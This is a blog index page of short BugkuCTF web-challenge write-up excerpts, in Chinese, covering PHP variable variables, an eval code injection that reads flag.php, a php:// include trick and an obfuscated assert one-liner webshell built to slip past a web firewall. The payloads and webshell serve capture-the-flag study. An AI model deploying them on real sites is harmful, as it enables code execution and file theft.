bugkuctf-web
0ne_
这个作者很懒,什么都没留下…
展开
-
BugkuCTF-速度要快
1. F12查看网页源代码根据显示的内容,猜测可能需要使用post提交margin的值,那么接下来就找margin对应的值。2.查看响应头看到flag,base64解码,提交之后发现是错的,后面才知道flag是变化的。3.还是根据第一步老老实实找margin值,抓包发现phpsession字段,猜测获取页面信息和提交margin值,可能需要使用同一个sessionimport re...原创 2018-11-25 13:02:02 · 2119 阅读 · 0 评论 -
BugkuCTF-变量1
1.打开题目发现一段php代码,一个if判断语句,正则条件只匹配由数字、26个英文字母或者下划线组成的字符串 ,详情请看https://www.w3cschool.cn/regexp/6a7w1pr0.html2.再看最后输出$$args,就相当于比如$args='a',输出$a一样<?php$a=123;$b='a';echo $b;?>输出就为1233...原创 2018-11-25 13:47:01 · 624 阅读 · 0 评论 -
BugkuCTF-计算器
1.打开题目之后发现如何输入都只能输入一位数,自然想到hackbar2.F12修改元素,把1改成23.拿到flag原创 2018-11-25 14:03:22 · 702 阅读 · 0 评论 -
BugkuCTF-文件包含
方法一:eval存在命令执行漏洞,使用hello构造payloadhttp://123.206.87.240:8003/?hello=1);show_source(%27flag.php%27);var_dump(3方法二:构造伪协议http://123.206.87.240:8003/?hello=1);include $_POST['f'];//在POST区域:f=php...原创 2018-11-27 19:19:16 · 522 阅读 · 0 评论 -
BugkuCTF-过狗一句话
提示代码<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>用assert执行任意函数payload:?s=print_r(scandi...原创 2018-11-28 13:51:00 · 940 阅读 · 0 评论